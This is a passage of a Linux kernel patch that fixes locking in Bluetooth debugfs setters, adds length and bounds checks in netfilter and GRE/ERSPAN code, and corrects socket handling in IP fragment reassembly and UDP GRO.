+ 	hci_dev_unlock(hdev);
+ 
+@@ -245,10 +247,12 @@ static int conn_info_max_age_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val == 0 || val < hdev->conn_info_min_age)
++	hci_dev_lock(hdev);
++	if (val == 0 || val < hdev->conn_info_min_age) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->conn_info_max_age = val;
+ 	hci_dev_unlock(hdev);
+ 
+@@ -566,10 +570,12 @@ static int sniff_min_interval_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val == 0 || val % 2 || val > hdev->sniff_max_interval)
++	hci_dev_lock(hdev);
++	if (val == 0 || val % 2 || val > hdev->sniff_max_interval) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->sniff_min_interval = val;
+ 	hci_dev_unlock(hdev);
+ 
+@@ -594,10 +600,12 @@ static int sniff_max_interval_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val == 0 || val % 2 || val < hdev->sniff_min_interval)
++	hci_dev_lock(hdev);
++	if (val == 0 || val % 2 || val < hdev->sniff_min_interval) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->sniff_max_interval = val;
+ 	hci_dev_unlock(hdev);
+ 
+@@ -849,10 +857,12 @@ static int conn_min_interval_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val < 0x0006 || val > 0x0c80 || val > hdev->le_conn_max_interval)
++	hci_dev_lock(hdev);
++	if (val < 0x0006 || val > 0x0c80 || val > hdev->le_conn_max_interval) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->le_conn_min_interval = val;
+ 	hci_dev_unlock(hdev);
+ 
+@@ -877,10 +887,12 @@ static int conn_max_interval_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val < 0x0006 || val > 0x0c80 || val < hdev->le_conn_min_interval)
++	hci_dev_lock(hdev);
++	if (val < 0x0006 || val > 0x0c80 || val < hdev->le_conn_min_interval) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->le_conn_max_interval = val;
+ 	hci_dev_unlock(hdev);
+ 
+@@ -989,10 +1001,12 @@ static int adv_min_interval_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val < 0x0020 || val > 0x4000 || val > hdev->le_adv_max_interval)
++	hci_dev_lock(hdev);
++	if (val < 0x0020 || val > 0x4000 || val > hdev->le_adv_max_interval) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->le_adv_min_interval = val;
+ 	hci_dev_unlock(hdev);
+ 
+@@ -1017,10 +1031,12 @@ static int adv_max_interval_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val < 0x0020 || val > 0x4000 || val < hdev->le_adv_min_interval)
++	hci_dev_lock(hdev);
++	if (val < 0x0020 || val > 0x4000 || val < hdev->le_adv_min_interval) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->le_adv_max_interval = val;
+ 	hci_dev_unlock(hdev);
+ 
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index b150dee88f35c..bc14223f66937 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -3234,6 +3234,31 @@ static void hci_conn_complete_evt(struct hci_dev *hdev, void *data,
+ 		if (test_bit(HCI_ENCRYPT, &hdev->flags))
+ 			set_bit(HCI_CONN_ENCRYPT, &conn->flags);
+ 
++		/* "Link key request" completed ahead of "connect request" completes */
++		if (ev->encr_mode == 1 && !test_bit(HCI_CONN_ENCRYPT, &conn->flags) &&
++		    ev->link_type == ACL_LINK) {
++			struct link_key *key;
++			struct hci_cp_read_enc_key_size cp;
++
++			key = hci_find_link_key(hdev, &ev->bdaddr);
++			if (key) {
++				set_bit(HCI_CONN_ENCRYPT, &conn->flags);
++
++				if (!(hdev->commands[20] & 0x10)) {
++					conn->enc_key_size = HCI_LINK_KEY_SIZE;
++				} else {
++					cp.handle = cpu_to_le16(conn->handle);
++					if (hci_send_cmd(hdev, HCI_OP_READ_ENC_KEY_SIZE,
++							 sizeof(cp), &cp)) {
++						bt_dev_err(hdev, "sending read key size failed");
++						conn->enc_key_size = HCI_LINK_KEY_SIZE;
++					}
++				}
++
++				hci_encrypt_cfm(conn, ev->status);
++			}
++		}
++
+ 		/* Get remote features */
+ 		if (conn->type == ACL_LINK) {
+ 			struct hci_cp_read_remote_features cp;
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 7e64cf880f9f1..e24b211b10ff5 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -3293,7 +3293,10 @@ static void hci_dev_get_bd_addr_from_property(struct hci_dev *hdev)
+ 	if (ret < 0 || !bacmp(&ba, BDADDR_ANY))
+ 		return;
+ 
+-	bacpy(&hdev->public_addr, &ba);
++	if (test_bit(HCI_QUIRK_BDADDR_PROPERTY_BROKEN, &hdev->quirks))
++		baswap(&hdev->public_addr, &ba);
++	else
++		bacpy(&hdev->public_addr, &ba);
+ }
+ 
+ struct hci_init_stage {
+diff --git a/net/bridge/netfilter/ebtables.c b/net/bridge/netfilter/ebtables.c
+index aa23479b20b2a..ed62c1026fe93 100644
+--- a/net/bridge/netfilter/ebtables.c
++++ b/net/bridge/netfilter/ebtables.c
+@@ -1111,6 +1111,8 @@ static int do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 	struct ebt_table_info *newinfo;
+ 	struct ebt_replace tmp;
+ 
++	if (len < sizeof(tmp))
++		return -EINVAL;
+ 	if (copy_from_sockptr(&tmp, arg, sizeof(tmp)) != 0)
+ 		return -EFAULT;
+ 
+@@ -1423,6 +1425,8 @@ static int update_counters(struct net *net, sockptr_t arg, unsigned int len)
+ {
+ 	struct ebt_replace hlp;
+ 
++	if (len < sizeof(hlp))
++		return -EINVAL;
+ 	if (copy_from_sockptr(&hlp, arg, sizeof(hlp)))
+ 		return -EFAULT;
+ 
+@@ -2352,6 +2356,8 @@ static int compat_update_counters(struct net *net, sockptr_t arg,
+ {
+ 	struct compat_ebt_replace hlp;
+ 
++	if (len < sizeof(hlp))
++		return -EINVAL;
+ 	if (copy_from_sockptr(&hlp, arg, sizeof(hlp)))
+ 		return -EFAULT;
+ 
+diff --git a/net/core/gro.c b/net/core/gro.c
+index 352f966cb1dac..47118e97ecfdd 100644
+--- a/net/core/gro.c
++++ b/net/core/gro.c
+@@ -252,8 +252,9 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb)
+ 	}
+ 
+ merge:
+-	/* sk owenrship - if any - completely transferred to the aggregated packet */
++	/* sk ownership - if any - completely transferred to the aggregated packet */
+ 	skb->destructor = NULL;
++	skb->sk = NULL;
+ 	delta_truesize = skb->truesize;
+ 	if (offset > headlen) {
+ 		unsigned int eat = offset - headlen;
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index 91140bc0541f3..aa7ff6a464291 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -413,6 +413,9 @@ static int __sock_map_delete(struct bpf_stab *stab, struct sock *sk_test,
+ 	struct sock *sk;
+ 	int err = 0;
+ 
++	if (irqs_disabled())
++		return -EOPNOTSUPP; /* locks here are hardirq-unsafe */
++
+ 	raw_spin_lock_bh(&stab->lock);
+ 	sk = *psk;
+ 	if (!sk_test || sk_test == sk)
+@@ -926,6 +929,9 @@ static int sock_hash_delete_elem(struct bpf_map *map, void *key)
+ 	struct bpf_shtab_elem *elem;
+ 	int ret = -ENOENT;
+ 
++	if (irqs_disabled())
++		return -EOPNOTSUPP; /* locks here are hardirq-unsafe */
++
+ 	hash = sock_hash_bucket_hash(key, key_size);
+ 	bucket = sock_hash_select_bucket(htab, hash);
+ 
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 79fa19a36bbd1..8407098a59391 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -289,6 +289,7 @@ static bool inet_bhash2_addr_any_conflict(const struct sock *sk, int port, int l
+ 	struct sock_reuseport *reuseport_cb;
+ 	struct inet_bind_hashbucket *head2;
+ 	struct inet_bind2_bucket *tb2;
++	bool conflict = false;
+ 	bool reuseport_cb_ok;
+ 
+ 	rcu_read_lock();
+@@ -301,18 +302,20 @@ static bool inet_bhash2_addr_any_conflict(const struct sock *sk, int port, int l
+ 
+ 	spin_lock(&head2->lock);
+ 
+-	inet_bind_bucket_for_each(tb2, &head2->chain)
+-		if (inet_bind2_bucket_match_addr_any(tb2, net, port, l3mdev, sk))
+-			break;
++	inet_bind_bucket_for_each(tb2, &head2->chain) {
++		if (!inet_bind2_bucket_match_addr_any(tb2, net, port, l3mdev, sk))
++			continue;
+ 
+-	if (tb2 && inet_bhash2_conflict(sk, tb2, uid, relax, reuseport_cb_ok,
+-					reuseport_ok)) {
+-		spin_unlock(&head2->lock);
+-		return true;
++		if (!inet_bhash2_conflict(sk, tb2, uid, relax, reuseport_cb_ok,	reuseport_ok))
++			continue;
++
++		conflict = true;
++		break;
+ 	}
+ 
+ 	spin_unlock(&head2->lock);
+-	return false;
++
++	return conflict;
+ }
+ 
+ /*
+@@ -771,6 +774,20 @@ void inet_csk_clear_xmit_timers(struct sock *sk)
+ }
+ EXPORT_SYMBOL(inet_csk_clear_xmit_timers);
+ 
++void inet_csk_clear_xmit_timers_sync(struct sock *sk)
++{
++	struct inet_connection_sock *icsk = inet_csk(sk);
++
++	/* ongoing timer handlers need to acquire socket lock. */
++	sock_not_owned_by_me(sk);
++
++	icsk->icsk_pending = icsk->icsk_ack.pending = 0;
++
++	sk_stop_timer_sync(sk, &icsk->icsk_retransmit_timer);
++	sk_stop_timer_sync(sk, &icsk->icsk_delack_timer);
++	sk_stop_timer_sync(sk, &sk->sk_timer);
++}
++
+ void inet_csk_delete_keepalive_timer(struct sock *sk)
+ {
+ 	sk_stop_timer(sk, &sk->sk_timer);
+diff --git a/net/ipv4/inet_fragment.c b/net/ipv4/inet_fragment.c
+index c9f9ac5013a71..834cdc57755f7 100644
+--- a/net/ipv4/inet_fragment.c
++++ b/net/ipv4/inet_fragment.c
+@@ -24,6 +24,8 @@
+ #include <net/ip.h>
+ #include <net/ipv6.h>
+ 
++#include "../core/sock_destructor.h"
++
+ /* Use skb->cb to track consecutive/adjacent fragments coming at
+  * the end of the queue. Nodes in the rb-tree queue will
+  * contain "runs" of one or more adjacent fragments.
+@@ -39,6 +41,7 @@ struct ipfrag_skb_cb {
+ 	};
+ 	struct sk_buff		*next_frag;
+ 	int			frag_run_len;
++	int			ip_defrag_offset;
+ };
+ 
+ #define FRAG_CB(skb)		((struct ipfrag_skb_cb *)((skb)->cb))
+@@ -390,12 +393,12 @@ int inet_frag_queue_insert(struct inet_frag_queue *q, struct sk_buff *skb,
+ 	 */
+ 	if (!last)
+ 		fragrun_create(q, skb);  /* First fragment. */
+-	else if (last->ip_defrag_offset + last->len < end) {
++	else if (FRAG_CB(last)->ip_defrag_offset + last->len < end) {
+ 		/* This is the common case: skb goes to the end. */
+ 		/* Detect and discard overlaps. */
+-		if (offset < last->ip_defrag_offset + last->len)
++		if (offset < FRAG_CB(last)->ip_defrag_offset + last->len)
+ 			return IPFRAG_OVERLAP;
+-		if (offset == last->ip_defrag_offset + last->len)
++		if (offset == FRAG_CB(last)->ip_defrag_offset + last->len)
+ 			fragrun_append_to_last(q, skb);
+ 		else
+ 			fragrun_create(q, skb);
+@@ -412,13 +415,13 @@ int inet_frag_queue_insert(struct inet_frag_queue *q, struct sk_buff *skb,
+ 
+ 			parent = *rbn;
+ 			curr = rb_to_skb(parent);
+-			curr_run_end = curr->ip_defrag_offset +
++			curr_run_end = FRAG_CB(curr)->ip_defrag_offset +
+ 					FRAG_CB(curr)->frag_run_len;
+-			if (end <= curr->ip_defrag_offset)
++			if (end <= FRAG_CB(curr)->ip_defrag_offset)
+ 				rbn = &parent->rb_left;
+ 			else if (offset >= curr_run_end)
+ 				rbn = &parent->rb_right;
+-			else if (offset >= curr->ip_defrag_offset &&
++			else if (offset >= FRAG_CB(curr)->ip_defrag_offset &&
+ 				 end <= curr_run_end)
+ 				return IPFRAG_DUP;
+ 			else
+@@ -432,7 +435,7 @@ int inet_frag_queue_insert(struct inet_frag_queue *q, struct sk_buff *skb,
+ 		rb_insert_color(&skb->rbnode, &q->rb_fragments);
+ 	}
+ 
+-	skb->ip_defrag_offset = offset;
++	FRAG_CB(skb)->ip_defrag_offset = offset;
+ 
+ 	return IPFRAG_OK;
+ }
+@@ -442,13 +445,28 @@ void *inet_frag_reasm_prepare(struct inet_frag_queue *q, struct sk_buff *skb,
+ 			      struct sk_buff *parent)
+ {
+ 	struct sk_buff *fp, *head = skb_rb_first(&q->rb_fragments);
+-	struct sk_buff **nextp;
++	void (*destructor)(struct sk_buff *);
++	unsigned int orig_truesize = 0;
++	struct sk_buff **nextp = NULL;
++	struct sock *sk = skb->sk;
+ 	int delta;
+ 
++	if (sk && is_skb_wmem(skb)) {
++		/* TX: skb->sk might have been passed as argument to
++		 * dst->output and must remain valid until tx completes.
++		 *
++		 * Move sk to reassembled skb and fix up wmem accounting.
++		 */
++		orig_truesize = skb->truesize;
++		destructor = skb->destructor;
++	}
++
+ 	if (head != skb) {
+ 		fp = skb_clone(skb, GFP_ATOMIC);
+-		if (!fp)
+-			return NULL;
++		if (!fp) {
++			head = skb;
++			goto out_restore_sk;
++		}
+ 		FRAG_CB(fp)->next_frag = FRAG_CB(skb)->next_frag;
+ 		if (RB_EMPTY_NODE(&skb->rbnode))
+ 			FRAG_CB(parent)->next_frag = fp;
+@@ -457,6 +475,12 @@ void *inet_frag_reasm_prepare(struct inet_frag_queue *q, struct sk_buff *skb,
+ 					&q->rb_fragments);
+ 		if (q->fragments_tail == skb)
+ 			q->fragments_tail = fp;
++
++		if (orig_truesize) {
++			/* prevent skb_morph from releasing sk */
++			skb->sk = NULL;
++			skb->destructor = NULL;
++		}
+ 		skb_morph(skb, head);
+ 		FRAG_CB(skb)->next_frag = FRAG_CB(head)->next_frag;
+ 		rb_replace_node(&head->rbnode, &skb->rbnode,
+@@ -464,13 +488,13 @@ void *inet_frag_reasm_prepare(struct inet_frag_queue *q, struct sk_buff *skb,
+ 		consume_skb(head);
+ 		head = skb;
+ 	}
+-	WARN_ON(head->ip_defrag_offset != 0);
++	WARN_ON(FRAG_CB(head)->ip_defrag_offset != 0);
+ 
+ 	delta = -head->truesize;
+ 
+ 	/* Head of list must not be cloned. */
+ 	if (skb_unclone(head, GFP_ATOMIC))
+-		return NULL;
++		goto out_restore_sk;
+ 
+ 	delta += head->truesize;
+ 	if (delta)
+@@ -486,7 +510,7 @@ void *inet_frag_reasm_prepare(struct inet_frag_queue *q, struct sk_buff *skb,
+ 
+ 		clone = alloc_skb(0, GFP_ATOMIC);
+ 		if (!clone)
+-			return NULL;
++			goto out_restore_sk;
+ 		skb_shinfo(clone)->frag_list = skb_shinfo(head)->frag_list;
+ 		skb_frag_list_init(head);
+ 		for (i = 0; i < skb_shinfo(head)->nr_frags; i++)
+@@ -503,6 +527,21 @@ void *inet_frag_reasm_prepare(struct inet_frag_queue *q, struct sk_buff *skb,
+ 		nextp = &skb_shinfo(head)->frag_list;
+ 	}
+ 
++out_restore_sk:
++	if (orig_truesize) {
++		int ts_delta = head->truesize - orig_truesize;
++
++		/* if this reassembled skb is fragmented later,
++		 * fraglist skbs will get skb->sk assigned from head->sk,
++		 * and each frag skb will be released via sock_wfree.
++		 *
++		 * Update sk_wmem_alloc.
++		 */
++		head->sk = sk;
++		head->destructor = destructor;
++		refcount_add(ts_delta, &sk->sk_wmem_alloc);
++	}
++
+ 	return nextp;
+ }
+ EXPORT_SYMBOL(inet_frag_reasm_prepare);
+@@ -510,6 +549,8 @@ EXPORT_SYMBOL(inet_frag_reasm_prepare);
+ void inet_frag_reasm_finish(struct inet_frag_queue *q, struct sk_buff *head,
+ 			    void *reasm_data, bool try_coalesce)
+ {
++	struct sock *sk = is_skb_wmem(head) ? head->sk : NULL;
++	const unsigned int head_truesize = head->truesize;
+ 	struct sk_buff **nextp = reasm_data;
+ 	struct rb_node *rbn;
+ 	struct sk_buff *fp;
+@@ -573,6 +614,9 @@ void inet_frag_reasm_finish(struct inet_frag_queue *q, struct sk_buff *head,
+ 	head->prev = NULL;
+ 	head->tstamp = q->stamp;
+ 	head->mono_delivery_time = q->mono_delivery_time;
++
++	if (sk)
++		refcount_add(sum_truesize - head_truesize, &sk->sk_wmem_alloc);
+ }
+ EXPORT_SYMBOL(inet_frag_reasm_finish);
+ 
+diff --git a/net/ipv4/ip_fragment.c b/net/ipv4/ip_fragment.c
+index fb153569889ec..6c309c1ec3b0f 100644
+--- a/net/ipv4/ip_fragment.c
++++ b/net/ipv4/ip_fragment.c
+@@ -378,6 +378,7 @@ static int ip_frag_queue(struct ipq *qp, struct sk_buff *skb)
+ 	}
+ 
+ 	skb_dst_drop(skb);
++	skb_orphan(skb);
+ 	return -EINPROGRESS;
+ 
+ insert_error:
+@@ -480,7 +481,6 @@ int ip_defrag(struct net *net, struct sk_buff *skb, u32 user)
+ 	struct ipq *qp;
+ 
+ 	__IP_INC_STATS(net, IPSTATS_MIB_REASMREQDS);
+-	skb_orphan(skb);
+ 
+ 	/* Lookup (or create) queue header */
+ 	qp = ip_find(net, ip_hdr(skb), user, vif);
+diff --git a/net/ipv4/ip_gre.c b/net/ipv4/ip_gre.c
+index d67d026d7f975..0267fa05374aa 100644
+--- a/net/ipv4/ip_gre.c
++++ b/net/ipv4/ip_gre.c
+@@ -280,8 +280,13 @@ static int erspan_rcv(struct sk_buff *skb, struct tnl_ptk_info *tpi,
+ 					  tpi->flags | TUNNEL_NO_KEY,
+ 					  iph->saddr, iph->daddr, 0);
+ 	} else {
++		if (unlikely(!pskb_may_pull(skb,
++					    gre_hdr_len + sizeof(*ershdr))))
++			return PACKET_REJECT;
++
+ 		ershdr = (struct erspan_base_hdr *)(skb->data + gre_hdr_len);
+ 		ver = ershdr->ver;
++		iph = ip_hdr(skb);
+ 		tunnel = ip_tunnel_lookup(itn, skb->dev->ifindex,
+ 					  tpi->flags | TUNNEL_KEY,
+ 					  iph->saddr, iph->daddr, tpi->key);
+diff --git a/net/ipv4/netfilter/arp_tables.c b/net/ipv4/netfilter/arp_tables.c
+index 2407066b0fec1..b150c9929b12e 100644
+--- a/net/ipv4/netfilter/arp_tables.c
++++ b/net/ipv4/netfilter/arp_tables.c
+@@ -956,6 +956,8 @@ static int do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 	void *loc_cpu_entry;
+ 	struct arpt_entry *iter;
+ 
++	if (len < sizeof(tmp))
++		return -EINVAL;
+ 	if (copy_from_sockptr(&tmp, arg, sizeof(tmp)) != 0)
+ 		return -EFAULT;
+ 
+@@ -1254,6 +1256,8 @@ static int compat_do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 	void *loc_cpu_entry;
+ 	struct arpt_entry *iter;
+ 
++	if (len < sizeof(tmp))
++		return -EINVAL;
+ 	if (copy_from_sockptr(&tmp, arg, sizeof(tmp)) != 0)
+ 		return -EFAULT;
+ 
+diff --git a/net/ipv4/netfilter/ip_tables.c b/net/ipv4/netfilter/ip_tables.c
+index da5998011ab9b..1f365e28e316c 100644
+--- a/net/ipv4/netfilter/ip_tables.c
++++ b/net/ipv4/netfilter/ip_tables.c
+@@ -1110,6 +1110,8 @@ do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 	void *loc_cpu_entry;
+ 	struct ipt_entry *iter;
+ 
++	if (len < sizeof(tmp))
++		return -EINVAL;
+ 	if (copy_from_sockptr(&tmp, arg, sizeof(tmp)) != 0)
+ 		return -EFAULT;
+ 
+@@ -1494,6 +1496,8 @@ compat_do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 	void *loc_cpu_entry;
+ 	struct ipt_entry *iter;
+ 
++	if (len < sizeof(tmp))
++		return -EINVAL;
+ 	if (copy_from_sockptr(&tmp, arg, sizeof(tmp)) != 0)
+ 		return -EFAULT;
+ 
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 5a165e29f7be4..f01c0a5d2c37b 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -3052,6 +3052,8 @@ void tcp_close(struct sock *sk, long timeout)
+ 	lock_sock(sk);
+ 	__tcp_close(sk, timeout);
+ 	release_sock(sk);
++	if (!sk->sk_net_refcnt)
++		inet_csk_clear_xmit_timers_sync(sk);
+ 	sock_put(sk);
+ }
+ EXPORT_SYMBOL(tcp_close);
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 7856b7a3e0ee9..2a78c78186c37 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -603,6 +603,13 @@ static inline bool __udp_is_mcast_sock(struct net *net, struct sock *sk,
+ }
+ 
+ DEFINE_STATIC_KEY_FALSE(udp_encap_needed_key);
++EXPORT_SYMBOL(udp_encap_needed_key);
++
++#if IS_ENABLED(CONFIG_IPV6)
++DEFINE_STATIC_KEY_FALSE(udpv6_encap_needed_key);
++EXPORT_SYMBOL(udpv6_encap_needed_key);
++#endif
++
+ void udp_encap_enable(void)
+ {
+ 	static_branch_inc(&udp_encap_needed_key);
+diff --git a/net/ipv4/udp_offload.c b/net/ipv4/udp_offload.c
+index 8096576fd9bde..84b7d6089f76c 100644
+--- a/net/ipv4/udp_offload.c
++++ b/net/ipv4/udp_offload.c
+@@ -441,8 +441,9 @@ static int skb_gro_receive_list(struct sk_buff *p, struct sk_buff *skb)
+ 	NAPI_GRO_CB(p)->count++;
+ 	p->data_len += skb->len;
+ 
+-	/* sk owenrship - if any - completely transferred to the aggregated packet */
++	/* sk ownership - if any - completely transferred to the aggregated packet */
+ 	skb->destructor = NULL;
++	skb->sk = NULL;
+ 	p->truesize += skb->truesize;
+ 	p->len += skb->len;
+ 
+@@ -543,11 +544,19 @@ struct sk_buff *udp_gro_receive(struct list_head *head, struct sk_buff *skb,
+ 	unsigned int off = skb_gro_offset(skb);
+ 	int flush = 1;
+ 
+-	/* we can do L4 aggregation only if the packet can't land in a tunnel
+-	 * otherwise we could corrupt the inner stream
++	/* We can do L4 aggregation only if the packet can't land in a tunnel
++	 * otherwise we could corrupt the inner stream. Detecting such packets
++	 * cannot be foolproof and the aggregation might still happen in some
++	 * cases. Such packets should be caught in udp_unexpected_gso later.
+ 	 */
+ 	NAPI_GRO_CB(skb)->is_flist = 0;
+ 	if (!sk || !udp_sk(sk)->gro_receive) {
++		/* If the packet was locally encapsulated in a UDP tunnel that
++		 * wasn't detected above, do not GRO.
++		 */
++		if (skb->encapsulation)
++			goto out;
++
+ 		if (skb->dev->features & NETIF_F_GRO_FRAGLIST)
+ 			NAPI_GRO_CB(skb)->is_flist = sk ? !udp_test_bit(GRO_ENABLED, sk) : 1;
+ 
+@@ -707,13 +716,7 @@ INDIRECT_CALLABLE_SCOPE int udp4_gro_complete(struct sk_buff *skb, int nhoff)
+ 		skb_shinfo(skb)->gso_type |= (SKB_GSO_FRAGLIST|SKB_GSO_UDP_L4);
+ 		skb_shinfo(skb)->gso_segs = NAPI_GRO_CB(skb)->count;
+ 
+-		if (skb->ip_summed == CHECKSUM_UNNECESSARY) {
+-			if (skb->csum_level < SKB_MAX_CSUM_LEVEL)
+-				skb->csum_level++;
+-		} else {
+-			skb->ip_summed = CHECKSUM_UNNECESSARY;
+-			skb->csum_level = 0;
+-		}
++		__skb_incr_checksum_unnecessary(skb);
+ 
+ 		return 0;
+ 	}
+diff --git a/net/ipv6/ip6_fib.c b/net/ipv6/ip6_fib.c
+index 1840735e9cb07..e606374854ce5 100644
+--- a/net/ipv6/ip6_fib.c
++++ b/net/ipv6/ip6_fib.c
+@@ -646,19 +646,19 @@ static int inet6_dump_fib(struct sk_buff *skb, struct netlink_callback *cb)
+ 	if (!w) {
+ 		/* New dump:
+ 		 *
+-		 * 1. hook callback destructor.
+-		 */
+-		cb->args[3] = (long)cb->done;
+-		cb->done = fib6_dump_done;
+-
+-		/*
+-		 * 2. allocate and initialize walker.
++		 * 1. allocate and initialize walker.
+ 		 */
+ 		w = kzalloc(sizeof(*w), GFP_ATOMIC);
+ 		if (!w)
+ 			return -ENOMEM;
+ 		w->func = fib6_dump_node;
+ 		cb->args[2] = (long)w;
++
++		/* 2. hook callback destructor.
++		 */
++		cb->args[3] = (long)cb->done;
++		cb->done = fib6_dump_done;
++
+ 	}
+ 
+ 	arg.skb = skb;
+diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
+index d3fba7d8dec4e..b3e2d658af809 100644
+--- a/net/ipv6/ip6_gre.c
++++ b/net/ipv6/ip6_gre.c
+@@ -528,6 +528,9 @@ static int ip6erspan_rcv(struct sk_buff *skb,
+ 	struct ip6_tnl *tunnel;
+ 	u8 ver;
+ 
++	if (unlikely(!pskb_may_pull(skb, sizeof(*ershdr))))
++		return PACKET_REJECT;
++
+ 	ipv6h = ipv6_hdr(skb);
+ 	ershdr = (struct erspan_base_hdr *)skb->data;
+ 	ver = ershdr->ver;
+diff --git a/net/ipv6/netfilter/ip6_tables.c b/net/ipv6/netfilter/ip6_tables.c
+index 0ce0ed17c7583..37a2b3301e423 100644
+--- a/net/ipv6/netfilter/ip6_tables.c
++++ b/net/ipv6/netfilter/ip6_tables.c
+@@ -1127,6 +1127,8 @@ do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 	void *loc_cpu_entry;
+ 	struct ip6t_entry *iter;
+ 
++	if (len < sizeof(tmp))
++		return -EINVAL;
+ 	if (copy_from_sockptr(&tmp, arg, sizeof(tmp)) != 0)
+ 		return -EFAULT;
+ 
+@@ -1503,6 +1505,8 @@ compat_do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 	void *loc_cpu_entry;
+ 	struct ip6t_entry *iter;
+ 
++	if (len < sizeof(tmp))
++		return -EINVAL;
+ 	if (copy_from_sockptr(&tmp, arg, sizeof(tmp)) != 0)
+ 		return -EFAULT;
+ 
+diff --git a/net/ipv6/netfilter/nf_conntrack_reasm.c b/net/ipv6/netfilter/nf_conntrack_reasm.c
+index 38db0064d6613..87a394179092c 100644
+--- a/net/ipv6/netfilter/nf_conntrack_reasm.c
++++ b/net/ipv6/netfilter/nf_conntrack_reasm.c
+@@ -293,6 +293,7 @@ static int nf_ct_frag6_queue(struct frag_queue *fq, struct sk_buff *skb,
+ 	}
+ 
+ 	skb_dst_drop(skb);
++	skb_orphan(skb);
+ 	return -EINPROGRESS;
+ 
+ insert_error:
+@@ -468,7 +469,6 @@ int nf_ct_frag6_gather(struct net *net, struct sk_buff *skb, u32 user)
+ 	hdr = ipv6_hdr(skb);
+ 	fhdr = (struct frag_hdr *)skb_transport_header(skb);
+ 
+-	skb_orphan(skb);
+ 	fq = fq_find(net, fhdr->identification, user, hdr,
+ 		     skb->dev ? skb->dev->ifindex : 0);
+ 	if (fq == NULL) {
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index c2c02dea6c386..1775e9b9b85ad 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -476,7 +476,7 @@ int udpv6_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 	goto try_again;
+ }
+ 
+-DEFINE_STATIC_KEY_FALSE(udpv6_encap_needed_key);
++DECLARE_STATIC_KEY_FALSE(udpv6_encap_needed_key);
+ void udpv6_encap_enable(void)
+ {
+ 	static_branch_inc(&udpv6_encap_needed_key);
+diff --git a/net/ipv6/udp_offload.c b/net/ipv6/udp_offload.c
+index 7720d04ed396d..b98c4c8d8e274 100644
+--- a/net/ipv6/udp_offload.c
++++ b/net/ipv6/udp_offload.c
+@@ -169,13 +169,7 @@ INDIRECT_CALLABLE_SCOPE int udp6_gro_complete(struct sk_buff *skb, int nhoff)
+ 		skb_shinfo(skb)->gso_type |= (SKB_GSO_FRAGLIST|SKB_GSO_UDP_L4);
+ 		skb_shinfo(skb)->gso_segs = NAPI_GRO_CB(skb)->count;
+ 
+-		if (skb->ip_summed == CHECKSUM_UNNECESSARY) {
+-			if (skb->csum_level < SKB_MAX_CSUM_LEVEL)
+-				skb->csum_level++;
+-		} else {
+-			skb->ip_summed = CHECKSUM_UNNECESSARY;
+-			skb->csum_level = 0;
+-		}
++		__skb_incr_checksum_unnecessary(skb);
+ 
+ 		return 0;
+ 	}
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 3bc21581486ae..c652c8ca765c2 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -3349,9 +3349,6 @@ static struct sock *mptcp_accept(struct sock *sk, int flags, int *err,
+ 
+ 		newsk = new_mptcp_sock;
+ 		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_MPCAPABLEPASSIVEACK);
+-	} else {
+-		MPTCP_INC_STATS(sock_net(sk),
+-				MPTCP_MIB_MPCAPABLEPASSIVEFALLBACK);
+ 	}
+ 
+ out:
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 891c2f4fed080..f1d422396b28b 100644
